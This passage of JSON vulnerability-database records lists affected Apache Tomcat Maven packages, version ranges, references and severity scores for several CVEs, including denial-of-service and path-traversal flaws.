"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], 
"versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ 
"9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", 
"8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2025-49125" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/7617b9c247bc77ed0444dd69adcd8aa48777886c" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9418e3ff9f1f4c006b4661311ae9376c52d162b9" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d94bd36fb7eb32e790dae0339bc249069649a637" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/m66cytbfrty9k7dc4cg6tl1czhsnbywk" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/06/16/2" } ], "database_specific": { "cwe_ids": [ "CWE-288" ], "github_reviewed": true, "github_reviewed_at": "2025-06-16T18:02:12Z", "nvd_published_at": "2025-06-16T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wf5v-jhxj-q632", "published": "2022-05-17T00:24:30Z", "modified": "2024-11-28T05:36:07.555519Z", "aliases": [ "CVE-2014-0095" ], "summary": "Denial of service in Apache Tomcat", "details": "java/org/apache/coyote/ajp/AbstractAjpProcessor.java in Apache Tomcat 8.x before 8.0.4 allows remote attackers to cause a denial of service (thread consumption) by using a \"Content-Length: 0\" AJP request to trigger a hang in request processing.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.4" } ] } ], "versions": [ 
"8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-wf5v-jhxj-q632/GHSA-wf5v-jhxj-q632.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.4" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-wf5v-jhxj-q632/GHSA-wf5v-jhxj-q632.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0095" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8884dae60ace77a87ed9385442ce429e98c3a479" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/77590c897f0e542fe363d70efdf3b82209510aee" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://web.archive.org/web/20140713043210/http://www.securitytracker.com/id/1030300" }, { "type": "WEB", "url": "https://web.archive.org/web/20141126170141/http://www.securityfocus.com/bid/67673" }, { "type": "WEB", "url": "https://web.archive.org/web/20151017043748/http://secunia.com/advisories/60729" }, { "type": "WEB", "url": "https://web.archive.org/web/20161024215453/http://secunia.com/advisories/59873" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2014/May/134" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578392" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678231" }, { "type": "WEB", "url": 
"http://www-01.ibm.com/support/docview.wss?uid=swg21681528" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2024-01-08T20:19:10Z", "nvd_published_at": "2014-05-31T11:17:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-wm9w-rjj3-j356", "published": "2024-07-03T21:39:44Z", "modified": "2025-11-03T22:02:29.679753Z", "aliases": [ "BIT-tomcat-2024-34750", "CVE-2024-34750" ], "related": [ "CGA-xv4j-9m39-wrpw" ], "summary": "Apache Tomcat - Denial of Service", "details": "Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed. \n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.0-M1 through 9.0.89. 
The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100.\n\nUsers are recommended to upgrade to version 11.0.0-M21, 10.1.25 or 9.0.90, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M21" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.25" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", 
"events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.90" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M21" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": 
"pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.25" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.90" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89" ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", 
"8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34750" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2344a4c0d03e307ba6b8ab6dc8b894cc8bac63f2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2afae300c9ac9c0e516e2e9de580847d925365c3" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9fec9a82887853402833a80b584e3762c7423f5f" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/4kqf0bc9gxymjc2x7v3p7dvplnl77y8l" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240816-0004" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-755" ], "github_reviewed": true, "github_reviewed_at": "2024-07-05T20:39:41Z", "nvd_published_at": "2024-07-03T20:15:04Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wmwf-9ccg-fff5", "published": "2025-10-27T18:31:13Z", "modified": "2025-11-05T21:07:34.950738Z", "aliases": [ "CVE-2025-55752" ], "related": [ "CGA-ffp8-8jhj-qx69", "CGA-wr6g-phvx-mg75", "CGA-xrp3-jgrh-29hf" ], "summary": "Apache Tomcat Vulnerable to Relative Path Traversal", "details": "The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI.\n\n\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108.\n\nThe following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 though 8.5.100. Other, older, EOL versions may also be affected. 
